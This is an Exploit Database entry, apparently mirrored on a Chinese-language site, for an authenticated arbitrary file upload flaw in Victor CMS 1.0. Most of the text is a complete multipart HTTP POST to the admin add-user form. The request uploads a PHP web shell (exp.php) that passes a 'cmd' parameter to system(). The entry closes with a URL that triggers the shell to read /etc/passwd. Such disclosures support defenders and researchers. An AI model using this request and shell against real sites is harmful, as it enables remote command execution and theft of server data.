Victor CMS 1.0 – Authenticated Arbitrary File Upload

• Exploit Database
• 121 阅读

• 作者： Kishan Lal Choudhary
  日期： 2020-05-19
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/48490/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68

  # Exploit Title: Victor CMS 1.0 - Authenticated Arbitrary File Upload # Google Dork: N/A # Date: 2020-05-19 # Exploit Author: Kishan Lal Choudhary # Vendor Homepage: https://github.com/VictorAlagwu/CMSsite # Software Link: https://github.com/VictorAlagwu/CMSsite/archive/master.zip # Version: 1.0 # Tested on: Windows 10   Description: The GET parameter '/admin/users.php?source=add_user' is vulnerable Arbitary File Uploads     POST /admin/users.php?source=add_user HTTP/1.1 Host: localhost Content-Length: 1049 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrMPNq33u6rCpEFhB User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://localhost/admin/users.php?source=add_user Accept-Encoding: gzip, deflate Accept-Language: en-GB,en;q=0.9,en-US;q=0.8,fr;q=0.7 Cookie: PHPSESSID=cjpan858fghefnjse7qv1j3v72 Connection: close   ------WebKitFormBoundaryrMPNq33u6rCpEFhB Content-Disposition: form-data; name="user_name"   test ------WebKitFormBoundaryrMPNq33u6rCpEFhB Content-Disposition: form-data; name="user_firstname"   test ------WebKitFormBoundaryrMPNq33u6rCpEFhB Content-Disposition: form-data; name="user_lastname"   test ------WebKitFormBoundaryrMPNq33u6rCpEFhB Content-Disposition: form-data; name="user_image"; filename="exp.php" Content-Type: application/octet-stream   <?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?> ------WebKitFormBoundaryrMPNq33u6rCpEFhB Content-Disposition: form-data; name="user_role"   Admin ------WebKitFormBoundaryrMPNq33u6rCpEFhB Content-Disposition: form-data; name="user_email"   test@tets.com ------WebKitFormBoundaryrMPNq33u6rCpEFhB Content-Disposition: form-data; name="user_password"   test@1234 ------WebKitFormBoundaryrMPNq33u6rCpEFhB Content-Disposition: form-data; name="create_user"   Add User ------WebKitFormBoundaryrMPNq33u6rCpEFhB--       The Shell can be triggered by visting   http://localhost/img/exp.php?cmd=cat%20/etc/passwd